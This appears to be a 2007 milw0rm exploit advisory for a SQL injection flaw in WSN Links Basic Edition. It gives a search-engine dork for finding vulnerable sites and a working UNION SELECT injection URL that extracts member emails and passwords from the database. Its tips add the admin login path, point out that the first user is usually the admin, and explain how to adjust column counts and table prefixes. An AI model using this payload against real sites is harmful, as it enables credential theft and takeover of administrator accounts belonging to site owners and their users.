34 lines
No EOL
1.4 KiB
Text
34 lines
No EOL
1.4 KiB
Text
--==+================================================================================+==--
|
|
--==+ WSN Links Basic Edition SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
AUTHOR: t0pP8uZz & xprog
|
|
SITE: wsnforum.com
|
|
DORK: Google: intext:"Powered by WSN Links Basic Edition" Altavista: "Powered by WSN Links Basic Edition"
|
|
|
|
|
|
DESCRIPTION:
|
|
pull out member info from the database
|
|
|
|
|
|
EXPLOITS:
|
|
http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/wsnlinks_members/**/LIMIT/**/0,1/*
|
|
|
|
|
|
NOTE/TIP:
|
|
admin login is at Script_Dir/adminlogin.php usually the first user is admin
|
|
also the amount of 'columns' may differ althou its normally 35 or 28.
|
|
the script also uses table prefix, the most used are wsnlinks and wsn so that would make the table wsn_members ect.
|
|
|
|
|
|
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
|
|
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ WSN Links Basic Edition SQL Injection Vulnerbility +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2007-07-21] |